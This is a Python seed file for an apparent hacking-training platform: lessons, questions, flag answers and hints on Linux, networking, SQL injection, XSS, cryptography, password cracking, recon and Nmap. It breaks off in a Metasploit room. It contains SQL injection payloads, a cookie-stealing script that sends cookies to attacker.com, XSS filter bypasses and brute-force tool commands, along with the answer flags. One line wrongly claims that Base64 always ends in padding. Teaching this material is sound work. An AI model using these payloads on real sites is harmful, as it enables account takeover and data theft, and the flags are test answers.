from app import create_app, db
from app.models import Room, Task, Badge

app = create_app()

rooms_data = [

  # ── ROOM 1 ──────────────────────────────────────────────────────────────
  { 'title':'Linux Fundamentals', 'icon':'🐧', 'category':'Linux',
    'difficulty':'Beginner', 'order_index':1,
    'description':'Learn the essential Linux commands every hacker must know.',
    'tasks':[
      { 'order_index':1, 'title':'What is Linux?',
        'content':'Linux is a free, open-source operating system used by servers, hackers, and developers worldwide. Most hacking tools run on Linux. The most popular hacking distro is Kali Linux.',
        'question':'What is the name of the most popular hacking-focused Linux distribution?',
        'flag':'kali', 'hint':'Think of a martial art...', 'points':10 },
      { 'order_index':2, 'title':'Navigating the File System',
        'content':'`pwd` prints your current directory. `ls` lists files. `cd` changes directory. `cd ..` goes up one level. These are the most used commands in Linux.',
        'question':'Which command shows you which folder you are currently in?',
        'flag':'pwd', 'hint':'Print Working Directory...', 'points':10 },
      { 'order_index':3, 'title':'Reading Files',
        'content':'`cat filename` prints file content. `less filename` lets you scroll through it. `head filename` shows the first 10 lines. `tail filename` shows the last 10 lines.',
        'question':'What command displays the entire content of a file in the terminal?',
        'flag':'cat', 'hint':'Think of a small furry animal...', 'points':10 },
      { 'order_index':4, 'title':'File Permissions',
        'content':'Every Linux file has permissions: read (r), write (w), execute (x). You can see them with `ls -la`. The owner, group, and others each get their own permissions. `-rwxr-xr--` is an example.',
        'question':'What command lists files with their full permission details?',
        'flag':'ls -la', 'hint':'List with long format and all hidden files...', 'points':10 },
      { 'order_index':5, 'title':'Searching for Files',
        'content':'`find / -name "secret.txt"` searches the whole system for a file named secret.txt. `grep "password" file.txt` searches INSIDE a file for the word "password".',
        'question':'What command searches INSIDE a file for a specific word or pattern?',
        'flag':'grep', 'hint':'It sounds like a robot searching...', 'points':10 },
      { 'order_index':6, 'title':'Users and Superuser',
        'content':'Linux has normal users and a superuser called root. Root can do anything. `sudo command` runs a command as root. `whoami` tells you who you are logged in as.',
        'question':'What command tells you the username of who you are currently logged in as?',
        'flag':'whoami', 'hint':'Ask yourself...', 'points':10 },
      { 'order_index':7, 'title':'Network Commands',
        'content':'`ifconfig` or `ip a` shows your IP address and network interfaces. `ping google.com` tests if you can reach a server. These are used constantly in hacking.',
        'question':'What command shows you your IP address on Linux?',
        'flag':'ifconfig', 'hint':'Interface configuration...', 'points':10 },
      { 'order_index':8, 'title':'Processes',
        'content':'`ps aux` shows all running processes. `kill PID` stops a process. `top` shows live CPU/memory usage like Task Manager. Every program running is a process.',
        'question':'What command shows ALL running processes on a Linux system?',
        'flag':'ps aux', 'hint':'Process status, with all users and extra details...', 'points':10 },
      { 'order_index':9, 'title':'Linux Room Flag',
        'content':'Congratulations! You have completed all Linux Fundamentals tasks. You now know navigation, file reading, permissions, searching, users, network commands, and processes.',
        'question':'Submit the room completion flag: FLAG{linux_master_2024}',
        'flag':'FLAG{linux_master_2024}', 'hint':'It is written above...', 'points':25 },
    ]
  },

  # ── ROOM 2 ──────────────────────────────────────────────────────────────
  { 'title':'Networking Basics', 'icon':'🌐', 'category':'Networking',
    'difficulty':'Beginner', 'order_index':2,
    'description':'Understand how computers talk to each other — the foundation of all hacking.',
    'tasks':[
      { 'order_index':1, 'title':'What is an IP Address?',
        'content':'Every device on a network has an IP address. IPv4 looks like 192.168.1.1 — four numbers separated by dots, each between 0-255. Your local IP starts with 192.168. Your public IP is assigned by your ISP.',
        'question':'How many numbers (octets) are in an IPv4 address?',
        'flag':'4', 'hint':'Count the dots and add 1...', 'points':10 },
      { 'order_index':2, 'title':'What is a Port?',
        'content':'Ports are like doors on a computer. Each service uses a specific port. HTTP uses port 80. HTTPS uses port 443. SSH uses port 22. FTP uses port 21. There are 65535 total ports.',
        'question':'What port does HTTPS (secure web browsing) use?',
        'flag':'443', 'hint':'It is between 442 and 444...', 'points':10 },
      { 'order_index':3, 'title':'TCP vs UDP',
        'content':'TCP (Transmission Control Protocol) is reliable — it checks every packet arrived correctly. UDP (User Datagram Protocol) is fast but does not check. Web browsing uses TCP. Video calls use UDP.',
        'question':'Which protocol is faster but does not check if all packets arrived?',
        'flag':'UDP', 'hint':'The one used for video streaming...', 'points':10 },
      { 'order_index':4, 'title':'What is DNS?',
        'content':'DNS (Domain Name System) converts human-readable names like google.com into IP addresses like 142.250.74.46. Without DNS you would have to memorize IP addresses for every website.',
        'question':'What does DNS stand for?',
        'flag':'Domain Name System', 'hint':'It is the phonebook of the internet...', 'points':10 },
      { 'order_index':5, 'title':'What is a MAC Address?',
        'content':'Every network card has a permanent hardware address called a MAC address. It looks like: 00:1A:2B:3C:4D:5E — six pairs of hex characters. MAC addresses work on your local network only.',
        'question':'How many pairs of characters are in a MAC address?',
        'flag':'6', 'hint':'Count the colons and add 1...', 'points':10 },
      { 'order_index':6, 'title':'Subnets',
        'content':'A subnet groups IP addresses together. A subnet mask like 255.255.255.0 means the first three numbers are the network and the last number identifies the device. CIDR notation: 192.168.1.0/24.',
        'question':'In CIDR notation, what does the /24 in 192.168.1.0/24 represent?',
        'flag':'subnet mask', 'hint':'It describes how many bits define the network...', 'points':15 },
      { 'order_index':7, 'title':'OSI Model',
        'content':'The OSI model has 7 layers: Physical, Data Link, Network, Transport, Session, Presentation, Application. Hackers think about which layer an attack targets. SQL injection is Layer 7.',
        'question':'How many layers does the OSI model have?',
        'flag':'7', 'hint':'Lucky number...', 'points':10 },
      { 'order_index':8, 'title':'What is ARP?',
        'content':'ARP (Address Resolution Protocol) translates IP addresses into MAC addresses on a local network. Attackers use ARP poisoning to intercept traffic between two devices — a classic Man-in-the-Middle attack.',
        'question':'What does ARP stand for?',
        'flag':'Address Resolution Protocol', 'hint':'It resolves addresses...', 'points':10 },
      { 'order_index':9, 'title':'Networking Room Flag',
        'content':'Excellent! You now understand IP addresses, ports, TCP/UDP, DNS, MAC addresses, subnets, OSI model, and ARP. These are the building blocks of network hacking.',
        'question':'Submit the room flag: FLAG{networking_pro_2024}',
        'flag':'FLAG{networking_pro_2024}', 'hint':'It is written above...', 'points':25 },
    ]
  },

  # ── ROOM 3 ──────────────────────────────────────────────────────────────
  { 'title':'Web Security Fundamentals', 'icon':'🕸️', 'category':'Web',
    'difficulty':'Beginner', 'order_index':3,
    'description':'Learn how websites work and where they can be attacked.',
    'tasks':[
      { 'order_index':1, 'title':'How HTTP Works',
        'content':'HTTP (HyperText Transfer Protocol) is how browsers talk to web servers. You send a REQUEST (GET/POST) and the server sends a RESPONSE with a status code. 200=OK, 404=Not Found, 500=Server Error.',
        'question':'What HTTP status code means "Not Found"?',
        'flag':'404', 'hint':'The famous error everyone has seen...', 'points':10 },
      { 'order_index':2, 'title':'GET vs POST',
        'content':'GET requests put data in the URL: google.com/search?q=hacking. POST requests hide data in the request body. Login forms use POST. Searching usually uses GET. Both can be intercepted.',
        'question':'Which HTTP method puts data visibly in the URL?',
        'flag':'GET', 'hint':'You GET what you see...', 'points':10 },
      { 'order_index':3, 'title':'Cookies and Sessions',
        'content':'After you login, a server gives your browser a cookie — a small text file that proves who you are. If an attacker steals your cookie, they can log in as you. This is called Session Hijacking.',
        'question':'What is it called when an attacker steals your cookie to log in as you?',
        'flag':'session hijacking', 'hint':'Hijacking your session...', 'points':10 },
      { 'order_index':4, 'title':'View Page Source',
        'content':'Right-click any webpage and click "View Page Source". You can see all the HTML, sometimes comments left by developers with passwords or secrets. Always check source code in CTF challenges.',
        'question':'What keyboard shortcut opens page source in most browsers?',
        'flag':'ctrl+u', 'hint':'Control + the 21st letter of the alphabet...', 'points':10 },
      { 'order_index':5, 'title':'Developer Tools',
        'content':'Press F12 in any browser to open Developer Tools. The Network tab shows every request your browser makes. The Console lets you run JavaScript. The Storage tab shows cookies.',
        'question':'What key opens browser Developer Tools?',
        'flag':'F12', 'hint':'A function key...', 'points':10 },
      { 'order_index':6, 'title':'HTTPS and SSL',
        'content':'HTTPS encrypts traffic between your browser and the server using SSL/TLS. You can see the certificate by clicking the padlock icon. Hackers on your WiFi cannot read HTTPS traffic (usually).',
        'question':'What does the S in HTTPS stand for?',
        'flag':'Secure', 'hint':'It means your connection is protected...', 'points':10 },
      { 'order_index':7, 'title':'robots.txt',
        'content':'Every website can have a robots.txt file at /robots.txt that tells search engines which pages NOT to index. Hackers always check robots.txt because it often reveals hidden directories like /admin or /backup.',
        'question':'What file do hackers check first to find hidden directories on a website?',
        'flag':'robots.txt', 'hint':'It tells robots where not to go...', 'points':10 },
      { 'order_index':8, 'title':'HTTP Headers',
        'content':'HTTP headers carry extra information with every request/response. The Server header reveals what web server software is running. X-Powered-By reveals the backend language. This info helps attackers target known vulnerabilities.',
        'question':'Which HTTP header reveals what web server software is running?',
        'flag':'Server', 'hint':'It names the server...', 'points':10 },
      { 'order_index':9, 'title':'Web Security Room Flag',
        'content':'Great work! You now understand HTTP, GET/POST, cookies, page source, dev tools, HTTPS, robots.txt, and HTTP headers. You are ready to start attacking web applications.',
        'question':'Submit the room flag: FLAG{web_hacker_2024}',
        'flag':'FLAG{web_hacker_2024}', 'hint':'Written above...', 'points':25 },
    ]
  },

  # ── ROOM 4 ──────────────────────────────────────────────────────────────
  { 'title':'SQL Injection', 'icon':'💉', 'category':'Web Attacks',
    'difficulty':'Intermediate', 'order_index':4,
    'description':'Learn the most common web vulnerability that has leaked millions of passwords.',
    'tasks':[
      { 'order_index':1, 'title':'What is SQL?',
        'content':'SQL (Structured Query Language) is used to talk to databases. A login query looks like: SELECT * FROM users WHERE email="user@x.com" AND password="abc". The database returns the user if found.',
        'question':'What does SQL stand for?',
        'flag':'Structured Query Language', 'hint':'It structures queries in a language...', 'points':10 },
      { 'order_index':2, 'title':'How SQL Injection Works',
        'content':'If a website puts your input directly into a SQL query WITHOUT sanitizing it, you can inject extra SQL. Entering: admin\'-- into an email field makes the query: SELECT * FROM users WHERE email=\'admin\'--\' AND password=\'anything\'. The -- comments out the password check!',
        'question':'What two characters are used to start a SQL comment that ignores the rest of a query?',
        'flag':'--', 'hint':'Two dashes...', 'points':10 },
      { 'order_index':3, 'title':'Authentication Bypass',
        'content':'The classic SQLi bypass: enter \' OR 1=1-- as the username. This makes the query: WHERE username=\'\' OR 1=1--\'. Since 1=1 is always true, it returns ALL users and logs you in as the first one (usually admin).',
        'question':'In the classic SQLi bypass, what always-true condition is injected?',
        'flag':'1=1', 'hint':'One equals one is always...', 'points':10 },
      { 'order_index':4, 'title':'UNION Attacks',
        'content':'UNION lets you append extra SELECT queries. If a URL is: /product?id=1 you can try: /product?id=1 UNION SELECT username,password FROM users-- This pulls usernames and passwords from the users table.',
        'question':'What SQL keyword lets you combine the results of two SELECT queries?',
        'flag':'UNION', 'hint':'To join two things together...', 'points':15 },
      { 'order_index':5, 'title':'Finding Number of Columns',
        'content':'Before using UNION, you need to know how many columns the original query returns. Use ORDER BY: try ORDER BY 1--, ORDER BY 2--, ORDER BY 3-- until you get an error. The last working number = column count.',
        'question':'Which SQL clause do you use repeatedly to count the number of columns in a query?',
        'flag':'ORDER BY', 'hint':'You order results to find the limit...', 'points':15 },
      { 'order_index':6, 'title':'Extracting Database Info',
        'content':'Useful SQLi payloads: UNION SELECT table_name,2 FROM information_schema.tables-- lists all tables. UNION SELECT column_name,2 FROM information_schema.columns WHERE table_name="users"-- lists columns.',
        'question':'What special database in MySQL contains info about all tables and columns?',
        'flag':'information_schema', 'hint':'It is the schema of all schemas...', 'points':15 },
      { 'order_index':7, 'title':'Blind SQL Injection',
        'content':'Sometimes the page does not show query results directly. Blind SQLi uses TRUE/FALSE conditions: ?id=1 AND 1=1-- (page loads normally) vs ?id=1 AND 1=2-- (page breaks). You extract data one bit at a time.',
        'question':'What type of SQLi gives no direct output and requires TRUE/FALSE conditions?',
        'flag':'blind', 'hint':'It cannot see the results...', 'points':15 },
      { 'order_index':8, 'title':'Preventing SQL Injection',
        'content':'SQLi is prevented by using Prepared Statements (Parameterized Queries). Instead of: query = "SELECT * FROM users WHERE id=" + user_input, use placeholders: cursor.execute("SELECT * FROM users WHERE id=?", (user_input,))',
        'question':'What are the special queries that prevent SQL injection called?',
        'flag':'prepared statements', 'hint':'Prepared in advance with placeholders...', 'points':10 },
      { 'order_index':9, 'title':'SQLMap Tool',
        'content':'SQLMap is a free tool that automates SQL injection detection and exploitation. Command: sqlmap -u "http://target.com/page?id=1" --dbs. It finds vulnerable parameters and extracts databases automatically.',
        'question':'What is the name of the most popular automated SQL injection tool?',
        'flag':'sqlmap', 'hint':'SQL + map...', 'points':10 },
      { 'order_index':10, 'title':'SQL Injection Room Flag',
        'content':'Excellent! You now understand SQL injection from basics to UNION attacks, blind SQLi, and prevention. This is one of the most critical vulnerabilities in web security.',
        'question':'Submit the room flag: FLAG{sql_injection_expert}',
        'flag':'FLAG{sql_injection_expert}', 'hint':'Written above...', 'points':25 },
    ]
  },

  # ── ROOM 5 ──────────────────────────────────────────────────────────────
  { 'title':'Cross-Site Scripting (XSS)', 'icon':'⚡', 'category':'Web Attacks',
    'difficulty':'Intermediate', 'order_index':5,
    'description':'Learn how attackers inject malicious JavaScript into websites.',
    'tasks':[
      { 'order_index':1, 'title':'What is XSS?',
        'content':'XSS (Cross-Site Scripting) lets attackers inject JavaScript into a page that other users see. The browser trusts the page and runs the script. An attacker can steal cookies, redirect users, or take over accounts.',
        'question':'What does XSS stand for?',
        'flag':'Cross-Site Scripting', 'hint':'Scripting across sites...', 'points':10 },
      { 'order_index':2, 'title':'Reflected XSS',
        'content':'Reflected XSS: your input is immediately reflected back in the response. Example: a search page that shows "You searched for: [YOUR INPUT]". If you enter <script>alert(1)</script> and it runs, it is vulnerable.',
        'question':'What JavaScript function is commonly used to test for XSS by popping up a box?',
        'flag':'alert', 'hint':'It alerts you...', 'points':10 },
      { 'order_index':3, 'title':'Stored XSS',
        'content':'Stored (Persistent) XSS: your malicious script is saved in the database and shown to every user who visits the page. A comment on a blog with <script>stealCookies()</script> would run for every visitor.',
        'question':'Which type of XSS is more dangerous because it affects every user who visits a page?',
        'flag':'stored', 'hint':'It is stored in the database...', 'points':10 },
      { 'order_index':4, 'title':'Cookie Theft with XSS',
        'content':'Attackers use XSS to steal session cookies: <script>document.location="http://attacker.com/steal?c="+document.cookie</script>. This sends the victim\'s cookie to the attacker\'s server, allowing account takeover.',
        'question':'What JavaScript property gives you access to the current page\'s cookies?',
        'flag':'document.cookie', 'hint':'document dot something...', 'points':15 },
      { 'order_index':5, 'title':'DOM-Based XSS',
        'content':'DOM XSS happens entirely in the browser. The server is not involved — vulnerable JavaScript on the page itself reads from the URL or DOM and writes it unsafely. Example: document.write(location.hash)',
        'question':'What does DOM stand for in web development?',
        'flag':'Document Object Model', 'hint':'The model of objects in a document...', 'points':10 },
      { 'order_index':6, 'title':'Bypassing Filters',
        'content':'Many sites block the word "script". Bypasses include: <img src=x onerror=alert(1)>, <svg onload=alert(1)>, or using encoding like %3Cscript%3E. Attackers constantly find new bypass methods.',
        'question':'Which HTML tag uses the "onerror" event to run JavaScript without using script tags?',
        'flag':'img', 'hint':'It is used to display images...', 'points':15 },
      { 'order_index':7, 'title':'XSS and BeEF Framework',
        'content':'BeEF (Browser Exploitation Framework) is a tool that hooks a victim\'s browser via XSS. Once hooked, the attacker can see their browser history, take screenshots, redirect them, and run more attacks.',
        'question':'What does BeEF stand for?',
        'flag':'Browser Exploitation Framework', 'hint':'It exploits browsers...', 'points':15 },
      { 'order_index':8, 'title':'Preventing XSS',
        'content':'XSS is prevented by: 1) Encoding output (< becomes &lt;) so HTML is not rendered. 2) Content Security Policy (CSP) headers that block inline scripts. 3) HttpOnly cookies that JavaScript cannot read.',
        'question':'What cookie flag prevents JavaScript from reading a cookie?',
        'flag':'HttpOnly', 'hint':'HTTP only — no JS allowed...', 'points':10 },
      { 'order_index':9, 'title':'XSS Room Flag',
        'content':'Well done! You now understand reflected XSS, stored XSS, DOM XSS, cookie theft, filter bypasses, BeEF, and prevention. XSS is in the OWASP Top 10 most critical web vulnerabilities.',
        'question':'Submit the room flag: FLAG{xss_master_hacker}',
        'flag':'FLAG{xss_master_hacker}', 'hint':'Written above...', 'points':25 },
    ]
  },

  # ── ROOM 6 ──────────────────────────────────────────────────────────────
  { 'title':'Cryptography Basics', 'icon':'🔒', 'category':'Cryptography',
    'difficulty':'Beginner', 'order_index':6,
    'description':'Learn how encryption works and how hackers break weak crypto.',
    'tasks':[
      { 'order_index':1, 'title':'What is Cryptography?',
        'content':'Cryptography is the science of hiding information. Plaintext is original data. Ciphertext is encrypted data. A key is used to encrypt and decrypt. Without the key, the ciphertext looks like random noise.',
        'question':'What do you call the original, unencrypted data?',
        'flag':'plaintext', 'hint':'Plain and simple...', 'points':10 },
      { 'order_index':2, 'title':'Caesar Cipher',
        'content':'The Caesar cipher shifts each letter by a fixed number. ROT13 shifts by 13. "HELLO" with shift 3 becomes "KHOOR". Julius Caesar used this in ancient Rome. It is trivially broken today.',
        'question':'In ROT13, how many positions is each letter shifted?',
        'flag':'13', 'hint':'Half of the alphabet...', 'points':10 },
      { 'order_index':3, 'title':'Base64 Encoding',
        'content':'Base64 is NOT encryption — it is encoding. It converts binary data to text using 64 characters (A-Z, a-z, 0-9, +, /). It always ends in = or ==. Decode this: aGFja2Vy',
        'question':'What is the decoded value of aGFja2Vy? (use base64decode.org)',
        'flag':'hacker', 'hint':'Someone who breaks things...', 'points':10 },
      { 'order_index':4, 'title':'Hashing',
        'content':'A hash is a one-way function. MD5("hello") = 5d41402abc4b2a76b9719d911017c592. You cannot reverse it. Websites store password hashes, not passwords. If the hash database leaks, attackers crack hashes offline.',
        'question':'Is hashing reversible? Answer yes or no.',
        'flag':'no', 'hint':'You cannot un-hash...', 'points':10 },
      { 'order_index':5, 'title':'MD5 vs SHA',
        'content':'MD5 produces a 32-character hex hash. SHA-256 produces a 64-character hash. MD5 is broken and should NOT be used for passwords. SHA-256 is much stronger. Passwords should use bcrypt or Argon2.',
        'question':'How many characters long is an MD5 hash?',
        'flag':'32', 'hint':'Count the characters in: 5d41402abc4b2a76b9719d911017c592', 'points':10 },
      { 'order_index':6, 'title':'Rainbow Tables',
        'content':'A rainbow table is a precomputed list of hashes and their plaintexts. Attackers look up a stolen hash in the table to instantly find the password. SALTING prevents this — a random string added to each password before hashing.',
        'question':'What is added to a password before hashing to prevent rainbow table attacks?',
        'flag':'salt', 'hint':'You add it to food too...', 'points':15 },
      { 'order_index':7, 'title':'Symmetric Encryption',
        'content':'Symmetric encryption uses ONE key to both encrypt and decrypt. AES (Advanced Encryption Standard) is the most common — it is used in HTTPS, WhatsApp, and file encryption. The problem: how do you safely share the key?',
        'question':'What is the most widely used symmetric encryption algorithm?',
        'flag':'AES', 'hint':'Advanced Encryption Standard...', 'points':10 },
      { 'order_index':8, 'title':'Asymmetric Encryption',
        'content':'Asymmetric encryption uses a KEY PAIR: a public key (share freely) and a private key (keep secret). Anyone can encrypt with your public key. Only you can decrypt with your private key. RSA is the most common example.',
        'question':'Which key in asymmetric encryption do you keep completely secret?',
        'flag':'private key', 'hint':'The opposite of public...', 'points':10 },
      { 'order_index':9, 'title':'Cryptography Room Flag',
        'content':'Amazing! You now know plaintext/ciphertext, Caesar cipher, Base64, hashing, MD5/SHA, rainbow tables, AES, and RSA. Cryptography is essential knowledge for every cybersecurity professional.',
        'question':'Submit the room flag: FLAG{crypto_wizard_2024}',
        'flag':'FLAG{crypto_wizard_2024}', 'hint':'Written above...', 'points':25 },
    ]
  },

  # ── ROOM 7 ──────────────────────────────────────────────────────────────
  { 'title':'Password Attacks', 'icon':'🔑', 'category':'Exploitation',
    'difficulty':'Intermediate', 'order_index':7,
    'description':'Learn how attackers crack, guess, and steal passwords.',
    'tasks':[
      { 'order_index':1, 'title':'Types of Password Attacks',
        'content':'Main password attack types: Brute Force (try every combination), Dictionary Attack (try common words), Credential Stuffing (try leaked username/password pairs), Phishing (trick user into giving password).',
        'question':'What attack tries every possible combination of characters?',
        'flag':'brute force', 'hint':'Forcefully trying everything...', 'points':10 },
      { 'order_index':2, 'title':'Dictionary Attacks',
        'content':'Dictionary attacks use wordlists of common passwords. The most famous wordlist is rockyou.txt — it contains 14 million real passwords leaked in a 2009 hack. "123456", "password", "qwerty" are always in it.',
        'question':'What is the name of the most famous password wordlist used by hackers?',
        'flag':'rockyou.txt', 'hint':'A toy that... you know...', 'points':10 },
      { 'order_index':3, 'title':'Hashcat',
        'content':'Hashcat is the world\'s fastest password cracker. It uses your GPU. Command: hashcat -a 0 -m 0 hashes.txt rockyou.txt. -a 0 = dictionary attack. -m 0 = MD5 mode. It can crack billions of hashes per second.',
        'question':'What hardware does Hashcat primarily use to crack passwords so fast?',
        'flag':'GPU', 'hint':'Your graphics card...', 'points':10 },
      { 'order_index':4, 'title':'John the Ripper',
        'content':'John the Ripper (john) is another classic password cracker. It automatically detects hash types. Command: john --wordlist=rockyou.txt hashes.txt. Results: john --show hashes.txt.',
        'question':'What is the short command name for John the Ripper?',
        'flag':'john', 'hint':'A common first name...', 'points':10 },
      { 'order_index':5, 'title':'Password Spraying',
        'content':'Brute force locks accounts after many failures. Password spraying flips this: try ONE common password against MANY accounts. Try "Winter2024!" against 1000 usernames. You never trigger lockout on any single account.',
        'question':'Why is password spraying harder to detect than brute force?',
        'flag':'avoids account lockout', 'hint':'You never lock any single account...', 'points':15 },
      { 'order_index':6, 'title':'Hydra - Online Brute Force',
        'content':'Hydra brute forces online login forms. Command: hydra -l admin -P rockyou.txt 192.168.1.1 http-post-form "/login:username=^USER^&password=^PASS^:Invalid". It attacks the live login page.',
        'question':'What is the name of the popular tool used to brute force online login pages?',
        'flag':'hydra', 'hint':'A multi-headed serpent...', 'points':10 },
      { 'order_index':7, 'title':'Credential Stuffing',
        'content':'When a website is hacked, leaked username/password pairs are sold on the dark web. Attackers try these SAME credentials on other sites, because people reuse passwords. This is credential stuffing.',
        'question':'What is it called when leaked credentials from one site are tried on other sites?',
        'flag':'credential stuffing', 'hint':'Stuffing credentials from one breach into another...', 'points':10 },
      { 'order_index':8, 'title':'Strong Password Rules',
        'content':'A strong password: minimum 12 characters, mix of uppercase, lowercase, numbers, symbols, not a dictionary word. Better: use a passphrase like "Purple-Monkey-Dishwasher-9!". Best: use a password manager.',
        'question':'What is the recommended minimum length for a strong password?',
        'flag':'12', 'hint':'A dozen...', 'points':10 },
      { 'order_index':9, 'title':'Password Attacks Room Flag',
        'content':'Great! You now know brute force, dictionary attacks, rockyou.txt, hashcat, john, password spraying, hydra, credential stuffing, and strong password creation.',
        'question':'Submit the room flag: FLAG{password_cracker_pro}',
        'flag':'FLAG{password_cracker_pro}', 'hint':'Written above...', 'points':25 },
    ]
  },

  # ── ROOM 8 ──────────────────────────────────────────────────────────────
  { 'title':'Reconnaissance', 'icon':'🔭', 'category':'Penetration Testing',
    'difficulty':'Intermediate', 'order_index':8,
    'description':'Learn how hackers gather information about targets before attacking.',
    'tasks':[
      { 'order_index':1, 'title':'What is Reconnaissance?',
        'content':'Recon is the first phase of every penetration test. You gather as much information about the target as possible WITHOUT touching their systems yet. Passive recon uses public info. Active recon involves scanning.',
        'question':'What is the first phase of a penetration test?',
        'flag':'reconnaissance', 'hint':'Recon...', 'points':10 },
      { 'order_index':2, 'title':'WHOIS Lookup',
        'content':'WHOIS reveals who registered a domain. Run: whois google.com. It shows the registrar, registration date, expiry date, and sometimes the owner\'s name, email, and phone number. Available at whois.domaintools.com.',
        'question':'What tool reveals who registered a domain name?',
        'flag':'whois', 'hint':'WHO IS the owner?', 'points':10 },
      { 'order_index':3, 'title':'Google Dorking',
        'content':'Google dorking uses special search operators to find sensitive info. site:target.com filetype:pdf finds PDFs. inurl:admin finds admin pages. "index of /" finds open directories. intitle:"login" finds login pages.',
        'question':'What Google operator finds pages only on a specific website?',
        'flag':'site:', 'hint':'site colon...', 'points':10 },
      { 'order_index':4, 'title':'Shodan',
        'content':'Shodan is a search engine for internet-connected devices. Search "apache" to find Apache servers. Search for default passwords, open webcams, SCADA systems. Hackers use it to find vulnerable targets without scanning.',
        'question':'What is Shodan often called?',
        'flag':'search engine for hackers', 'hint':'It is a search engine, but for devices...', 'points':10 },
      { 'order_index':5, 'title':'DNS Enumeration',
        'content':'DNS records reveal a lot: A record (IP address), MX record (mail servers), TXT record (verification tokens). nslookup target.com or dig target.com reveal these. Subdomains like mail.target.com or dev.target.com are often less secure.',
        'question':'What DNS record type reveals a domain\'s IP address?',
        'flag':'A', 'hint':'The first letter of the alphabet...', 'points':10 },
      { 'order_index':6, 'title':'theHarvester',
        'content':'theHarvester collects emails, subdomains, IPs, and names from public sources. Command: theHarvester -d target.com -l 200 -b google. It searches Google, Bing, LinkedIn, and more. Very useful for corporate recon.',
        'question':'What type of personal data does theHarvester primarily harvest from public sources?',
        'flag':'emails', 'hint':'Electronic mail addresses...', 'points':10 },
      { 'order_index':7, 'title':'Maltego',
        'content':'Maltego is a visual link analysis tool. It maps relationships between people, companies, domains, IPs, emails, and social media accounts. It draws a graph showing how everything connects. Great for OSINT investigations.',
        'question':'What type of analysis does Maltego perform by drawing connection graphs?',
        'flag':'link analysis', 'hint':'It links things together visually...', 'points':15 },
      { 'order_index':8, 'title':'The Wayback Machine',
        'content':'web.archive.org stores historical snapshots of websites. You can see what a website looked like years ago — old login pages, removed content, leaked source code, or old admin panels that still work.',
        'question':'What website stores historical snapshots of web pages?',
        'flag':'web.archive.org', 'hint':'The internet\'s time machine...', 'points':10 },
      { 'order_index':9, 'title':'Reconnaissance Room Flag',
        'content':'Excellent! You now know passive recon, WHOIS, Google dorking, Shodan, DNS enumeration, theHarvester, Maltego, and the Wayback Machine. Information gathering is 90% of a real attack.',
        'question':'Submit the room flag: FLAG{recon_master_2024}',
        'flag':'FLAG{recon_master_2024}', 'hint':'Written above...', 'points':25 },
    ]
  },

  # ── ROOM 9 ──────────────────────────────────────────────────────────────
  { 'title':'Nmap - Network Scanning', 'icon':'📡', 'category':'Tools',
    'difficulty':'Intermediate', 'order_index':9,
    'description':'Master Nmap, the most essential network scanning tool in hacking.',
    'tasks':[
      { 'order_index':1, 'title':'What is Nmap?',
        'content':'Nmap (Network Mapper) is a free tool to discover hosts and services on a network. It tells you: which devices are online, what ports are open, what services are running, and what OS the target uses.',
        'question':'What does Nmap stand for?',
        'flag':'Network Mapper', 'hint':'It maps the network...', 'points':10 },
      { 'order_index':2, 'title':'Basic Nmap Scan',
        'content':'Basic scan: nmap 192.168.1.1. This scans the top 1000 most common ports. Result shows open/closed/filtered ports and the service name. Always the first thing to run against a target.',
        'question':'How many ports does a basic Nmap scan check by default?',
        'flag':'1000', 'hint':'Top one thousand...', 'points':10 },
      { 'order_index':3, 'title':'SYN Scan (Stealth Scan)',
        'content':'nmap -sS 192.168.1.1 is the SYN scan — the most popular. It sends a SYN packet (connection request) but never completes the handshake. Faster and less likely to be logged. Requires root privileges.',
        'question':'What flag enables the SYN stealth scan in Nmap?',
        'flag':'-sS', 'hint':'Dash capital S...', 'points':10 },
      { 'order_index':4, 'title':'Service Version Detection',
        'content':'nmap -sV 192.168.1.1 detects exact versions of services. Instead of just "port 22/ssh open", you get "OpenSSH 7.4". Knowing the exact version lets you search for its specific vulnerabilities.',
        'question':'What Nmap flag enables service version detection?',
        'flag':'-sV', 'hint':'Dash lowercase s, capital V...', 'points':10 },
      { 'order_index':5, 'title':'OS Detection',
        'content':'nmap -O 192.168.1.1 attempts to identify the target\'s operating system by analyzing how it responds to packets. It might say "Linux 4.x" or "Windows 10". Useful for choosing the right exploits.',
        'question':'What Nmap flag enables operating system detection?',
        'flag':'-O', 'hint':'Dash capital letter O...', 'points':10 },
      { 'order_index':6, 'title':'Scanning All Ports',
        'content':'nmap -p- 192.168.1.1 scans ALL 65535 ports. The default scan only checks 1000. Attackers often run services on unusual ports to hide them. Always do a full port scan in real assessments.',
        'question':'What Nmap flag scans all 65535 ports?',
        'flag':'-p-', 'hint':'Dash p dash...', 'points':10 },
      { 'order_index':7, 'title':'Nmap Scripts (NSE)',
        'content':'Nmap has a scripting engine (NSE) with 600+ scripts. nmap --script vuln 192.168.1.1 runs vulnerability detection scripts. nmap --script http-title 192.168.1.1 gets webpage titles. Extremely powerful.',
        'question':'What does NSE stand for in Nmap?',
        'flag':'Nmap Scripting Engine', 'hint':'It is an engine for scripts...', 'points':15 },
      { 'order_index':8, 'title':'Aggressive Scan',
        'content':'nmap -A 192.168.1.1 runs an aggressive scan: OS detection + version detection + script scanning + traceroute all at once. Very noisy (easy to detect) but gives maximum information. The "tell me everything" option.',
        'question':'What Nmap flag runs OS detection, version detection, scripts, and traceroute all at once?',
        'flag':'-A', 'hint':'Dash capital A for Aggressive...', 'points':10 },
      { 'order_index':9, 'title':'Nmap Room Flag',
        'content':'Perfect! You now know basic scanning, SYN scan, version detection, OS detection, full port scan, NSE scripts, and aggressive scan. Nmap is the most used tool in penetration testing.',
        'question':'Submit the room flag: FLAG{nmap_ninja_2024}',
        'flag':'FLAG{nmap_ninja_2024}', 'hint':'Written above...', 'points':25 },
    ]
  },

  # ── ROOM 10 ─────────────────────────────────────────────────────────────
  { 'title':'Metasploit Framework', 'icon':'💣', 'category':'Exploitation',
    'difficulty':'Advanced', 'order_index':10,
    'description':'Learn the world\'s most popular exploitation framework.',
    'tasks':[
      { 'order_index':1, 'title':'What is Metasploit?',
        'content':'Metasploit is a free framework for developing and executing exploits. It comes built into Kali Linux. It has 2000+ exploits, 500+ payloads, and many auxiliary tools. Command to start: msfconsole.',
        'question':'What command launches the Metasploit console?',
        'flag':'msfconsole', 'hint':'MSF console...', 'points':10 },
      { 'order_index':2, 'title':'Modules in Metasploit',
        'content':'Metasploit has module types: Exploits (attack code), Payloads (what runs after exploit), Auxiliaries (scanners, fuzzers), Post (post-exploitation), Encoders (evade detection). Use "search" to find modules.',
